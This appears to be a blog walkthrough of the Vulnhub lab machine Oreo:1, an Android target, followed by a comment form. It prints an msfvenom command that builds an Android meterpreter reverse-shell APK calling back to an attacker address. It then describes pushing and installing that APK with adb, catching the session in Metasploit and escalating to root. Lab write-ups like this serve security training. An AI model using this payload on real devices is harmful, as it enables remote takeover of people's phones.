Vulnhub – Oreo:1 Walkthrough

This is an Android box so we’re going to write adb devices to see the devices connected to our machine and then connect to it by writing adb shell:

Then we’re going to create a shell using

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=4444 R > shell.apk

In msfconsole we’re going to create a multi/handler to connect to the Android box after we push the shell.apk:

Now let’s push the shell to the Android box by using adb push shell.apk /mnt/sdcard:

Now on the Oreo virtual machine we go and install the apk file:

We can see the file on the Android terminal side:

After installing the file and opening it we will get a session on out metasploit:

Now just type shell and then write su root to get root access but while doing that you will get a Permission Denied so just click accept on the  root access message on the Oreo machine GUI to be allowed to access the.

Now we navigate to /data/ and we can cat the root.exe file:

3 thoughts on “Vulnhub – Oreo:1 Walkthrough”

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s